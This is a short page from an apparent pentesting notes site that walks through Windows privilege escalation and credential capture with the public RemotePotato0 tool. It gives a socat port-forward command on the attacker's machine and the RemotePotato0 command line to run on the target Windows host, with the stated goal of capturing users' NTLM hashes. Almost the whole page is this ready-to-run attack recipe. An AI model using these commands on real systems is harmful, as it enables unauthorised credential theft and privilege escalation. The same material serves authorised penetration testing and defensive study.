AD Privilege Escalation
  • Iperius Backup Service Privilege Escalation
  • ManageEngine ADSelfService Plus PrivEsc
  • Mimikatz
  • Outlook Reminder Privilege Escalation
  • UAC Windows Privilege Escalation
  • Windows PrivEsc with Kerberos
  • Windows PrivEsc with LocalPotato
  • Windows PrivEsc with Registry Keys
  • Windows PrivEsc with RemotePotato
  • Windows PrivEsc with SeBackupPrivilege
  • Windows PrivEsc with Unquoted Service Path
  • Windows Privilege Escalation
  • Windows Pivoting
  • AD CS (Active Directory Certificate Services) Pentesting
  • Dumping Windows Password Hashes
  • WSL Pentesting
  • Windows Memory Dump Analysis
  • Windows Remote Code Execution from Linux
  • Windows XML EventLog (EVTX)
  • M365 (Microsoft Office 365) Pentesting
  • Microsoft Outlook Message (.msg)
  • Microsoft Word Pentesting
  • Reading OneDrive Logs
Powered by GitBook
On this page
  • Exploit
  • References

Windows PrivEsc with RemotePotato

PreviousWindows PrivEsc with Registry KeysNextWindows PrivEsc with SeBackupPrivilege

Last updated 1 year ago

In local machine, start port forwarding.

sudo socat tcp-listen:135,fork,reuseaddr tcp:<remote-ip>:9999
Copied!

In target Windows machine, run RemotePotato. We can download the executable from .

# -m: Module (2: Rpc capture server + potato trigger)
# -x: Rogue Oxid resolver ip
# -s: Session id for the Cross Session Activation attack
.\RemotePotato0.exe -m 2 -x <local-ip> -p 9999 -s 1
Copied!

After that, we might be able to user password (NTLM hash).

References

Exploit
https://github.com/antonioCoco/RemotePotato0
https://github.com/antonioCoco/RemotePotato0
Page cover image